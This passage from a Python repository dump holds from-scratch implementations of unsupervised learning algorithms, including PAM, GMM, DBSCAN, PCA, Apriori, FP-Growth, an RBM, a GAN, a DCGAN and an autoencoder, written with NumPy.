""" clusters = [[] for _ in range(self.k)] for sample_i, sample in enumerate(X): medoid_i = self._closest_medoid(sample, medoids) clusters[medoid_i].append(sample_i) return clusters def _calculate_cost(self, X, clusters, medoids): """ Calculate the cost (total distance between samples and their medoids) """ cost = 0 # For each cluster for i, cluster in enumerate(clusters): medoid = medoids[i] for sample_i in cluster: # Add distance between sample and medoid as cost cost += euclidean_distance(X[sample_i], medoid) return cost def _get_non_medoids(self, X, medoids): """ Returns a list of all samples that are not currently medoids """ non_medoids = [] for sample in X: if not sample in medoids: non_medoids.append(sample) return non_medoids def _get_cluster_labels(self, clusters, X): """ Classify samples as the index of their clusters """ # One prediction for each sample y_pred = np.zeros(np.shape(X)[0]) for cluster_i in range(len(clusters)): cluster = clusters[cluster_i] for sample_i in cluster: y_pred[sample_i] = cluster_i return y_pred def predict(self, X): """ Do Partitioning Around Medoids and return the cluster labels """ # Initialize medoids randomly medoids = self._init_random_medoids(X) # Assign samples to closest medoids clusters = self._create_clusters(X, medoids) # Calculate the initial cost (total distance between samples and # corresponding medoids) cost = self._calculate_cost(X, clusters, medoids) # Iterate until we no longer have a cheaper cost while True: best_medoids = medoids lowest_cost = cost for medoid in medoids: # Get all non-medoid samples non_medoids = self._get_non_medoids(X, medoids) # Calculate the cost when swapping medoid and samples for sample in non_medoids: # Swap sample with the medoid new_medoids = medoids.copy() new_medoids[medoids == medoid] = sample # Assign samples to new medoids new_clusters = self._create_clusters(X, new_medoids) # Calculate the cost with the new set of medoids new_cost = self._calculate_cost( X, new_clusters, new_medoids) # If the swap gives us a lower cost we save the medoids and cost if new_cost < lowest_cost: lowest_cost = new_cost best_medoids = new_medoids # If there was a swap that resultet in a lower cost we save the # resulting medoids from the best swap and the new cost if lowest_cost < cost: cost = lowest_cost medoids = best_medoids # Else finished else: break final_clusters = self._create_clusters(X, medoids) # Return the samples cluster indices as labels return self._get_cluster_labels(final_clusters, X) File: mlfromscratch/unsupervised_learning/__init__.py from .principal_component_analysis import PCA from .apriori import Apriori from .dbscan import DBSCAN from .fp_growth import FPGrowth from .gaussian_mixture_model import GaussianMixtureModel from .genetic_algorithm import GeneticAlgorithm from .k_means import KMeans from .partitioning_around_medoids import PAM from .restricted_boltzmann_machine import RBM File: mlfromscratch/unsupervised_learning/dcgan.py from __future__ import print_function, division import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy from mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization, ZeroPadding2D, Conv2D, UpSampling2D from mlfromscratch.deep_learning import NeuralNetwork class DCGAN(): def __init__(self): self.img_rows = 28 self.img_cols = 28 self.channels = 1 self.img_shape = (self.channels, self.img_rows, self.img_cols) self.latent_dim = 100 optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = CrossEntropy # Build the discriminator self.discriminator = self.build_discriminator(optimizer, loss_function) # Build the generator self.generator = self.build_generator(optimizer, loss_function) # Build the combined model self.combined = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.combined.layers.extend(self.generator.layers) self.combined.layers.extend(self.discriminator.layers) print () self.generator.summary(name="Generator") self.discriminator.summary(name="Discriminator") def build_generator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(128 * 7 * 7, input_shape=(100,))) model.add(Activation('leaky_relu')) model.add(Reshape((128, 7, 7))) model.add(BatchNormalization(momentum=0.8)) model.add(UpSampling2D()) model.add(Conv2D(128, filter_shape=(3,3), padding='same')) model.add(Activation("leaky_relu")) model.add(BatchNormalization(momentum=0.8)) model.add(UpSampling2D()) model.add(Conv2D(64, filter_shape=(3,3), padding='same')) model.add(Activation("leaky_relu")) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(1, filter_shape=(3,3), padding='same')) model.add(Activation("tanh")) return model def build_discriminator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Conv2D(32, filter_shape=(3,3), stride=2, input_shape=self.img_shape, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(Conv2D(64, filter_shape=(3,3), stride=2, padding='same')) model.add(ZeroPadding2D(padding=((0,1),(0,1)))) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(128, filter_shape=(3,3), stride=2, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(256, filter_shape=(3,3), stride=1, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(2)) model.add(Activation('softmax')) return model def train(self, epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data.reshape((-1,) + self.img_shape) y = mnist.target # Rescale -1 to 1 X = (X.astype(np.float32) - 127.5) / 127.5 half_batch = int(batch_size / 2) for epoch in range(epochs): # --------------------- # Train Discriminator # --------------------- self.discriminator.set_trainable(True) # Select a random half batch of images idx = np.random.randint(0, X.shape[0], half_batch) imgs = X[idx] # Sample noise to use as generator input noise = np.random.normal(0, 1, (half_batch, 100)) # Generate a half batch of images gen_imgs = self.generator.predict(noise) valid = np.concatenate((np.ones((half_batch, 1)), np.zeros((half_batch, 1))), axis=1) fake = np.concatenate((np.zeros((half_batch, 1)), np.ones((half_batch, 1))), axis=1) # Train the discriminator d_loss_real, d_acc_real = self.discriminator.train_on_batch(imgs, valid) d_loss_fake, d_acc_fake = self.discriminator.train_on_batch(gen_imgs, fake) d_loss = 0.5 * (d_loss_real + d_loss_fake) d_acc = 0.5 * (d_acc_real + d_acc_fake) # --------------------- # Train Generator # --------------------- # We only want to train the generator for the combined model self.discriminator.set_trainable(False) # Sample noise and use as generator input noise = np.random.normal(0, 1, (batch_size, self.latent_dim)) # The generator wants the discriminator to label the generated samples as valid valid = np.concatenate((np.ones((batch_size, 1)), np.zeros((batch_size, 1))), axis=1) # Train the generator g_loss, g_acc = self.combined.train_on_batch(noise, valid) # Display the progress print ("%d [D loss: %f, acc: %.2f%%] [G loss: %f, acc: %.2f%%]" % (epoch, d_loss, 100*d_acc, g_loss, 100*g_acc)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch) def save_imgs(self, epoch): r, c = 5, 5 noise = np.random.normal(0, 1, (r * c, 100)) gen_imgs = self.generator.predict(noise) # Rescale images 0 - 1 (from -1 to 1) gen_imgs = 0.5 * (gen_imgs + 1) fig, axs = plt.subplots(r, c) plt.suptitle("Deep Convolutional Generative Adversarial Network") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,0,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("mnist_%d.png" % epoch) plt.close() if __name__ == '__main__': dcgan = DCGAN() dcgan.train(epochs=200000, batch_size=64, save_interval=50) File: mlfromscratch/unsupervised_learning/gaussian_mixture_model.py from __future__ import division, print_function import math from sklearn import datasets import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, calculate_covariance_matrix from mlfromscratch.utils import Plot class GaussianMixtureModel(): """A probabilistic clustering method for determining groupings among data samples. Parameters: ----------- k: int The number of clusters the algorithm will form. max_iterations: int The number of iterations the algorithm will run for if it does not converge before that. tolerance: float If the difference of the results from one iteration to the next is smaller than this value we will say that the algorithm has converged. """ def __init__(self, k=2, max_iterations=2000, tolerance=1e-8): self.k = k self.parameters = [] self.max_iterations = max_iterations self.tolerance = tolerance self.responsibilities = [] self.sample_assignments = None self.responsibility = None def _init_random_gaussians(self, X): """ Initialize gaussian randomly """ n_samples = np.shape(X)[0] self.priors = (1 / self.k) * np.ones(self.k) for i in range(self.k): params = {} params["mean"] = X[np.random.choice(range(n_samples))] params["cov"] = calculate_covariance_matrix(X) self.parameters.append(params) def multivariate_gaussian(self, X, params): """ Likelihood """ n_features = np.shape(X)[1] mean = params["mean"] covar = params["cov"] determinant = np.linalg.det(covar) likelihoods = np.zeros(np.shape(X)[0]) for i, sample in enumerate(X): d = n_features # dimension coeff = (1.0 / (math.pow((2.0 * math.pi), d / 2) * math.sqrt(determinant))) exponent = math.exp(-0.5 * (sample - mean).T.dot(np.linalg.pinv(covar)).dot((sample - mean))) likelihoods[i] = coeff * exponent return likelihoods def _get_likelihoods(self, X): """ Calculate the likelihood over all samples """ n_samples = np.shape(X)[0] likelihoods = np.zeros((n_samples, self.k)) for i in range(self.k): likelihoods[ :, i] = self.multivariate_gaussian( X, self.parameters[i]) return likelihoods def _expectation(self, X): """ Calculate the responsibility """ # Calculate probabilities of X belonging to the different clusters weighted_likelihoods = self._get_likelihoods(X) * self.priors sum_likelihoods = np.expand_dims( np.sum(weighted_likelihoods, axis=1), axis=1) # Determine responsibility as P(X|y)*P(y)/P(X) self.responsibility = weighted_likelihoods / sum_likelihoods # Assign samples to cluster that has largest probability self.sample_assignments = self.responsibility.argmax(axis=1) # Save value for convergence check self.responsibilities.append(np.max(self.responsibility, axis=1)) def _maximization(self, X): """ Update the parameters and priors """ # Iterate through clusters and recalculate mean and covariance for i in range(self.k): resp = np.expand_dims(self.responsibility[:, i], axis=1) mean = (resp * X).sum(axis=0) / resp.sum() covariance = (X - mean).T.dot((X - mean) * resp) / resp.sum() self.parameters[i]["mean"], self.parameters[ i]["cov"] = mean, covariance # Update weights n_samples = np.shape(X)[0] self.priors = self.responsibility.sum(axis=0) / n_samples def _converged(self, X): """ Covergence if || likehood - last_likelihood || < tolerance """ if len(self.responsibilities) < 2: return False diff = np.linalg.norm( self.responsibilities[-1] - self.responsibilities[-2]) # print ("Likelihood update: %s (tol: %s)" % (diff, self.tolerance)) return diff <= self.tolerance def predict(self, X): """ Run GMM and return the cluster indices """ # Initialize the gaussians randomly self._init_random_gaussians(X) # Run EM until convergence or for max iterations for _ in range(self.max_iterations): self._expectation(X) # E-step self._maximization(X) # M-step # Check convergence if self._converged(X): break # Make new assignments and return them self._expectation(X) return self.sample_assignments File: mlfromscratch/unsupervised_learning/autoencoder.py from __future__ import print_function, division from sklearn import datasets import math import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy, SquareLoss from mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization from mlfromscratch.deep_learning import NeuralNetwork class Autoencoder(): """An Autoencoder with deep fully-connected neural nets. Training Data: MNIST Handwritten Digits (28x28 images) """ def __init__(self): self.img_rows = 28 self.img_cols = 28 self.img_dim = self.img_rows * self.img_cols self.latent_dim = 128 # The dimension of the data embedding optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = SquareLoss self.encoder = self.build_encoder(optimizer, loss_function) self.decoder = self.build_decoder(optimizer, loss_function) self.autoencoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.autoencoder.layers.extend(self.encoder.layers) self.autoencoder.layers.extend(self.decoder.layers) print () self.autoencoder.summary(name="Variational Autoencoder") def build_encoder(self, optimizer, loss_function): encoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) encoder.add(Dense(512, input_shape=(self.img_dim,))) encoder.add(Activation('leaky_relu')) encoder.add(BatchNormalization(momentum=0.8)) encoder.add(Dense(256)) encoder.add(Activation('leaky_relu')) encoder.add(BatchNormalization(momentum=0.8)) encoder.add(Dense(self.latent_dim)) return encoder def build_decoder(self, optimizer, loss_function): decoder = NeuralNetwork(optimizer=optimizer, loss=loss_function) decoder.add(Dense(256, input_shape=(self.latent_dim,))) decoder.add(Activation('leaky_relu')) decoder.add(BatchNormalization(momentum=0.8)) decoder.add(Dense(512)) decoder.add(Activation('leaky_relu')) decoder.add(BatchNormalization(momentum=0.8)) decoder.add(Dense(self.img_dim)) decoder.add(Activation('tanh')) return decoder def train(self, n_epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data y = mnist.target # Rescale [-1, 1] X = (X.astype(np.float32) - 127.5) / 127.5 for epoch in range(n_epochs): # Select a random half batch of images idx = np.random.randint(0, X.shape[0], batch_size) imgs = X[idx] # Train the Autoencoder loss, _ = self.autoencoder.train_on_batch(imgs, imgs) # Display the progress print ("%d [D loss: %f]" % (epoch, loss)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch, X) def save_imgs(self, epoch, X): r, c = 5, 5 # Grid size # Select a random half batch of images idx = np.random.randint(0, X.shape[0], r*c) imgs = X[idx] # Generate images and reshape to image shape gen_imgs = self.autoencoder.predict(imgs).reshape((-1, self.img_rows, self.img_cols)) # Rescale images 0 - 1 gen_imgs = 0.5 * gen_imgs + 0.5 fig, axs = plt.subplots(r, c) plt.suptitle("Autoencoder") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("ae_%d.png" % epoch) plt.close() if __name__ == '__main__': ae = Autoencoder() ae.train(n_epochs=200000, batch_size=64, save_interval=400) File: mlfromscratch/unsupervised_learning/apriori.py from __future__ import division, print_function import numpy as np import itertools class Rule(): def __init__(self, antecedent, concequent, confidence, support): self.antecedent = antecedent self.concequent = concequent self.confidence = confidence self.support = support class Apriori(): """A method for determining frequent itemsets in a transactional database and also for generating rules for those itemsets. Parameters: ----------- min_sup: float The minimum fraction of transactions an itemets needs to occur in to be deemed frequent min_conf: float: The minimum fraction of times the antecedent needs to imply the concequent to justify rule """ def __init__(self, min_sup=0.3, min_conf=0.81): self.min_sup = min_sup self.min_conf = min_conf self.freq_itemsets = None # List of freqeuent itemsets self.transactions = None # List of transactions def _calculate_support(self, itemset): count = 0 for transaction in self.transactions: if self._transaction_contains_items(transaction, itemset): count += 1 support = count / len(self.transactions) return support def _get_frequent_itemsets(self, candidates): """ Prunes the candidates that are not frequent => returns list with only frequent itemsets """ frequent = [] # Find frequent items for itemset in candidates: support = self._calculate_support(itemset) if support >= self.min_sup: frequent.append(itemset) return frequent def _has_infrequent_itemsets(self, candidate): """ True or false depending on the candidate has any subset with size k - 1 that is not in the frequent itemset """ k = len(candidate) # Find all combinations of size k-1 in candidate # E.g [1,2,3] => [[1,2],[1,3],[2,3]] subsets = list(itertools.combinations(candidate, k - 1)) for t in subsets: # t - is tuple. If size == 1 get the element subset = list(t) if len(t) > 1 else t[0] if not subset in self.freq_itemsets[-1]: return True return False def _generate_candidates(self, freq_itemset): """ Joins the elements in the frequent itemset and prunes resulting sets if they contain subsets that have been determined to be infrequent. """ candidates = [] for itemset1 in freq_itemset: for itemset2 in freq_itemset: # Valid if every element but the last are the same # and the last element in itemset1 is smaller than the last # in itemset2 valid = False single_item = isinstance(itemset1, int) if single_item and itemset1 < itemset2: valid = True elif not single_item and np.array_equal(itemset1[:-1], itemset2[:-1]) and itemset1[-1] < itemset2[-1]: valid = True if valid: # JOIN: Add the last element in itemset2 to itemset1 to # create a new candidate if single_item: candidate = [itemset1, itemset2] else: candidate = itemset1 + [itemset2[-1]] # PRUNE: Check if any subset of candidate have been determined # to be infrequent infrequent = self._has_infrequent_itemsets(candidate) if not infrequent: candidates.append(candidate) return candidates def _transaction_contains_items(self, transaction, items): """ True or false depending on each item in the itemset is in the transaction """ # If items is in fact only one item if isinstance(items, int): return items in transaction # Iterate through list of items and make sure that # all items are in the transaction for item in items: if not item in transaction: return False return True def find_frequent_itemsets(self, transactions): """ Returns the set of frequent itemsets in the list of transactions """ self.transactions = transactions # Get all unique items in the transactions unique_items = set(item for transaction in self.transactions for item in transaction) # Get the frequent items self.freq_itemsets = [self._get_frequent_itemsets(unique_items)] while(True): # Generate new candidates from last added frequent itemsets candidates = self._generate_candidates(self.freq_itemsets[-1]) # Get the frequent itemsets among those candidates frequent_itemsets = self._get_frequent_itemsets(candidates) # If there are no frequent itemsets we're done if not frequent_itemsets: break # Add them to the total list of frequent itemsets and start over self.freq_itemsets.append(frequent_itemsets) # Flatten the array and return every frequent itemset frequent_itemsets = [ itemset for sublist in self.freq_itemsets for itemset in sublist] return frequent_itemsets def _rules_from_itemset(self, initial_itemset, itemset): """ Recursive function which returns the rules where confidence >= min_confidence Starts with large itemset and recursively explores rules for subsets """ rules = [] k = len(itemset) # Get all combinations of sub-itemsets of size k - 1 from itemset # E.g [1,2,3] => [[1,2],[1,3],[2,3]] subsets = list(itertools.combinations(itemset, k - 1)) support = self._calculate_support(initial_itemset) for antecedent in subsets: # itertools.combinations returns tuples => convert to list antecedent = list(antecedent) antecedent_support = self._calculate_support(antecedent) # Calculate the confidence as sup(A and B) / sup(B), if antecedent # is B in an itemset of A and B confidence = float("{0:.2f}".format(support / antecedent_support)) if confidence >= self.min_conf: # The concequent is the initial_itemset except for antecedent concequent = [itemset for itemset in initial_itemset if not itemset in antecedent] # If single item => get item if len(antecedent) == 1: antecedent = antecedent[0] if len(concequent) == 1: concequent = concequent[0] # Create new rule rule = Rule( antecedent=antecedent, concequent=concequent, confidence=confidence, support=support) rules.append(rule) # If there are subsets that could result in rules # recursively add rules from subsets if k - 1 > 1: rules += self._rules_from_itemset(initial_itemset, antecedent) return rules def generate_rules(self, transactions): self.transactions = transactions frequent_itemsets = self.find_frequent_itemsets(transactions) # Only consider itemsets of size >= 2 items frequent_itemsets = [itemset for itemset in frequent_itemsets if not isinstance( itemset, int)] rules = [] for itemset in frequent_itemsets: rules += self._rules_from_itemset(itemset, itemset) # Remove empty values return rules File: mlfromscratch/unsupervised_learning/generative_adversarial_network.py from __future__ import print_function, division from sklearn import datasets import math import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy from mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization from mlfromscratch.deep_learning import NeuralNetwork class GAN(): """A Generative Adversarial Network with deep fully-connected neural nets as Generator and Discriminator. Training Data: MNIST Handwritten Digits (28x28 images) """ def __init__(self): self.img_rows = 28 self.img_cols = 28 self.img_dim = self.img_rows * self.img_cols self.latent_dim = 100 optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = CrossEntropy # Build the discriminator self.discriminator = self.build_discriminator(optimizer, loss_function) # Build the generator self.generator = self.build_generator(optimizer, loss_function) # Build the combined model self.combined = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.combined.layers.extend(self.generator.layers) self.combined.layers.extend(self.discriminator.layers) print () self.generator.summary(name="Generator") self.discriminator.summary(name="Discriminator") def build_generator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(256, input_shape=(self.latent_dim,))) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(512)) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(1024)) model.add(Activation('leaky_relu')) model.add(BatchNormalization(momentum=0.8)) model.add(Dense(self.img_dim)) model.add(Activation('tanh')) return model def build_discriminator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(512, input_shape=(self.img_dim,))) model.add(Activation('leaky_relu')) model.add(Dropout(0.5)) model.add(Dense(256)) model.add(Activation('leaky_relu')) model.add(Dropout(0.5)) model.add(Dense(2)) model.add(Activation('softmax')) return model def train(self, n_epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data y = mnist.target # Rescale [-1, 1] X = (X.astype(np.float32) - 127.5) / 127.5 half_batch = int(batch_size / 2) for epoch in range(n_epochs): # --------------------- # Train Discriminator # --------------------- self.discriminator.set_trainable(True) # Select a random half batch of images idx = np.random.randint(0, X.shape[0], half_batch) imgs = X[idx] # Sample noise to use as generator input noise = np.random.normal(0, 1, (half_batch, self.latent_dim)) # Generate a half batch of images gen_imgs = self.generator.predict(noise) # Valid = [1, 0], Fake = [0, 1] valid = np.concatenate((np.ones((half_batch, 1)), np.zeros((half_batch, 1))), axis=1) fake = np.concatenate((np.zeros((half_batch, 1)), np.ones((half_batch, 1))), axis=1) # Train the discriminator d_loss_real, d_acc_real = self.discriminator.train_on_batch(imgs, valid) d_loss_fake, d_acc_fake = self.discriminator.train_on_batch(gen_imgs, fake) d_loss = 0.5 * (d_loss_real + d_loss_fake) d_acc = 0.5 * (d_acc_real + d_acc_fake) # --------------------- # Train Generator # --------------------- # We only want to train the generator for the combined model self.discriminator.set_trainable(False) # Sample noise and use as generator input noise = np.random.normal(0, 1, (batch_size, self.latent_dim)) # The generator wants the discriminator to label the generated samples as valid valid = np.concatenate((np.ones((batch_size, 1)), np.zeros((batch_size, 1))), axis=1) # Train the generator g_loss, g_acc = self.combined.train_on_batch(noise, valid) # Display the progress print ("%d [D loss: %f, acc: %.2f%%] [G loss: %f, acc: %.2f%%]" % (epoch, d_loss, 100*d_acc, g_loss, 100*g_acc)) # If at save interval => save generated image samples if epoch % save_interval == 0: self.save_imgs(epoch) def save_imgs(self, epoch): r, c = 5, 5 # Grid size noise = np.random.normal(0, 1, (r * c, self.latent_dim)) # Generate images and reshape to image shape gen_imgs = self.generator.predict(noise).reshape((-1, self.img_rows, self.img_cols)) # Rescale images 0 - 1 gen_imgs = 0.5 * gen_imgs + 0.5 fig, axs = plt.subplots(r, c) plt.suptitle("Generative Adversarial Network") cnt = 0 for i in range(r): for j in range(c): axs[i,j].imshow(gen_imgs[cnt,:,:], cmap='gray') axs[i,j].axis('off') cnt += 1 fig.savefig("mnist_%d.png" % epoch) plt.close() if __name__ == '__main__': gan = GAN() gan.train(n_epochs=200000, batch_size=64, save_interval=400) File: mlfromscratch/unsupervised_learning/restricted_boltzmann_machine.py import logging import numpy as np import progressbar from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import batch_iterator from mlfromscratch.deep_learning.activation_functions import Sigmoid sigmoid = Sigmoid() class RBM(): """Bernoulli Restricted Boltzmann Machine (RBM) Parameters: ----------- n_hidden: int: The number of processing nodes (neurons) in the hidden layer. learning_rate: float The step length that will be used when updating the weights. batch_size: int The size of the mini-batch used to calculate each weight update. n_iterations: float The number of training iterations the algorithm will tune the weights for. Reference: A Practical Guide to Training Restricted Boltzmann Machines URL: https://www.cs.toronto.edu/~hinton/absps/guideTR.pdf """ def __init__(self, n_hidden=128, learning_rate=0.1, batch_size=10, n_iterations=100): self.n_iterations = n_iterations self.batch_size = batch_size self.lr = learning_rate self.n_hidden = n_hidden self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) def _initialize_weights(self, X): n_visible = X.shape[1] self.W = np.random.normal(scale=0.1, size=(n_visible, self.n_hidden)) self.v0 = np.zeros(n_visible) # Bias visible self.h0 = np.zeros(self.n_hidden) # Bias hidden def fit(self, X, y=None): '''Contrastive Divergence training procedure''' self._initialize_weights(X) self.training_errors = [] self.training_reconstructions = [] for _ in self.progressbar(range(self.n_iterations)): batch_errors = [] for batch in batch_iterator(X, batch_size=self.batch_size): # Positive phase positive_hidden = sigmoid(batch.dot(self.W) + self.h0) hidden_states = self._sample(positive_hidden) positive_associations = batch.T.dot(positive_hidden) # Negative phase negative_visible = sigmoid(hidden_states.dot(self.W.T) + self.v0) negative_visible = self._sample(negative_visible) negative_hidden = sigmoid(negative_visible.dot(self.W) + self.h0) negative_associations = negative_visible.T.dot(negative_hidden) self.W += self.lr * (positive_associations - negative_associations) self.h0 += self.lr * (positive_hidden.sum(axis=0) - negative_hidden.sum(axis=0)) self.v0 += self.lr * (batch.sum(axis=0) - negative_visible.sum(axis=0)) batch_errors.append(np.mean((batch - negative_visible) ** 2)) self.training_errors.append(np.mean(batch_errors)) # Reconstruct a batch of images from the training set idx = np.random.choice(range(X.shape[0]), self.batch_size) self.training_reconstructions.append(self.reconstruct(X[idx])) def _sample(self, X): return X > np.random.random_sample(size=X.shape) def reconstruct(self, X): positive_hidden = sigmoid(X.dot(self.W) + self.h0) hidden_states = self._sample(positive_hidden) negative_visible = sigmoid(hidden_states.dot(self.W.T) + self.v0) return negative_visible File: mlfromscratch/unsupervised_learning/dbscan.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import Plot, euclidean_distance, normalize class DBSCAN(): """A density based clustering method that expands clusters from samples that have more neighbors within a radius specified by eps than the value min_samples. Parameters: ----------- eps: float The radius within which samples are considered neighbors min_samples: int The number of neighbors required for the sample to be a core point. """ def __init__(self, eps=1, min_samples=5): self.eps = eps self.min_samples = min_samples def _get_neighbors(self, sample_i): """ Return a list of indexes of neighboring samples A sample_2 is considered a neighbor of sample_1 if the distance between them is smaller than epsilon """ neighbors = [] idxs = np.arange(len(self.X)) for i, _sample in enumerate(self.X[idxs != sample_i]): distance = euclidean_distance(self.X[sample_i], _sample) if distance < self.eps: neighbors.append(i) return np.array(neighbors) def _expand_cluster(self, sample_i, neighbors): """ Recursive method which expands the cluster until we have reached the border of the dense area (density determined by eps and min_samples) """ cluster = [sample_i] # Iterate through neighbors for neighbor_i in neighbors: if not neighbor_i in self.visited_samples: self.visited_samples.append(neighbor_i) # Fetch the sample's distant neighbors (neighbors of neighbor) self.neighbors[neighbor_i] = self._get_neighbors(neighbor_i) # Make sure the neighbor's neighbors are more than min_samples # (If this is true the neighbor is a core point) if len(self.neighbors[neighbor_i]) >= self.min_samples: # Expand the cluster from the neighbor expanded_cluster = self._expand_cluster( neighbor_i, self.neighbors[neighbor_i]) # Add expanded cluster to this cluster cluster = cluster + expanded_cluster else: # If the neighbor is not a core point we only add the neighbor point cluster.append(neighbor_i) return cluster def _get_cluster_labels(self): """ Return the samples labels as the index of the cluster in which they are contained """ # Set default value to number of clusters # Will make sure all outliers have same cluster label labels = np.full(shape=self.X.shape[0], fill_value=len(self.clusters)) for cluster_i, cluster in enumerate(self.clusters): for sample_i in cluster: labels[sample_i] = cluster_i return labels # DBSCAN def predict(self, X): self.X = X self.clusters = [] self.visited_samples = [] self.neighbors = {} n_samples = np.shape(self.X)[0] # Iterate through samples and expand clusters from them # if they have more neighbors than self.min_samples for sample_i in range(n_samples): if sample_i in self.visited_samples: continue self.neighbors[sample_i] = self._get_neighbors(sample_i) if len(self.neighbors[sample_i]) >= self.min_samples: # If core point => mark as visited self.visited_samples.append(sample_i) # Sample has more neighbors than self.min_samples => expand # cluster from sample new_cluster = self._expand_cluster( sample_i, self.neighbors[sample_i]) # Add cluster to list of clusters self.clusters.append(new_cluster) # Get the resulting cluster labels cluster_labels = self._get_cluster_labels() return cluster_labels File: mlfromscratch/unsupervised_learning/principal_component_analysis.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import calculate_covariance_matrix class PCA(): """A method for doing dimensionality reduction by transforming the feature space to a lower dimensionality, removing correlation between features and maximizing the variance along each feature axis. This class is also used throughout the project to plot data. """ def transform(self, X, n_components): """ Fit the dataset to the number of principal components specified in the constructor and return the transformed dataset """ covariance_matrix = calculate_covariance_matrix(X) # Where (eigenvector[:,0] corresponds to eigenvalue[0]) eigenvalues, eigenvectors = np.linalg.eig(covariance_matrix) # Sort the eigenvalues and corresponding eigenvectors from largest # to smallest eigenvalue and select the first n_components idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:n_components] eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :n_components] # Project the data onto principal components X_transformed = X.dot(eigenvectors) return X_transformed File: mlfromscratch/unsupervised_learning/fp_growth.py from __future__ import division, print_function import numpy as np import itertools class FPTreeNode(): def __init__(self, item=None, support=1): # 'Value' of the item self.item = item # Number of times the item occurs in a # transaction self.support = support # Child nodes in the FP Growth Tree self.children = {} class FPGrowth(): """A method for determining frequent itemsets in a transactional database. This is done by building a so called FP Growth tree, which can then be mined to collect the frequent itemsets. More effective than Apriori for large transactional databases. Parameters: ----------- min_sup: float The minimum fraction of transactions an itemets needs to occur in to be deemed frequent """ def __init__(self, min_sup=0.3): self.min_sup = min_sup # The root of the initial FP Growth Tree self.tree_root = None # Prefixes of itemsets in the FP Growth Tree self.prefixes = {} self.frequent_itemsets = [] # Count the number of transactions that contains item. def _calculate_support(self, item, transactions): count = 0 for transaction in transactions: if item in transaction: count += 1 support = count return support def _get_frequent_items(self, transactions): """ Returns a set of frequent items. An item is determined to be frequent if there are atleast min_sup transactions that contains it. """ # Get all unique items in the transactions unique_items = set( item for transaction in transactions for item in transaction) items = [] for item in unique_items: sup = self._calculate_support(item, transactions) if sup >= self.min_sup: items.append([item, sup]) # Sort by support - Highest to lowest items.sort(key=lambda item: item[1], reverse=True) frequent_items = [[el[0]] for el in items] # Only return the items return frequent_items def _insert_tree(self, node, children): """ Recursive method which adds nodes to the tree. """ if not children: return # Create new node as the first item in children list child_item = children[0] child = FPTreeNode(item=child_item) # If parent already contains item => increase the support if child_item in node.children: node.children[child.item].support += 1 else: node.children[child.item] = child # Execute _insert_tree on the rest of the children list # from the new node self._insert_tree(node.children[child.item], children[1:]) def _construct_tree(self, transactions, frequent_items=None): if not frequent_items: # Get frequent items sorted by support frequent_items = self._get_frequent_items(transactions) unique_frequent_items = list( set(item for itemset in frequent_items for item in itemset)) # Construct the root of the FP Growth tree root = FPTreeNode() for transaction in transactions: # Remove items that are not frequent according to # unique_frequent_items transaction = [item for item in transaction if item in unique_frequent_items] transaction.sort(key=lambda item: frequent_items.index([item])) self._insert_tree(root, transaction) return root def print_tree(self, node=None, indent_times=0): """ Recursive method which prints the FP Growth Tree """ if not node: node = self.tree_root indent = " " * indent_times print ("%s%s:%s" % (indent, node.item, node.support)) for child_key in node.children: child = node.children[child_key] self.print_tree(child, indent_times + 1) def _is_prefix(self, itemset, node): """ Makes sure that the first item in itemset is a child of node and that every following item in itemset is reachable via that path """ for 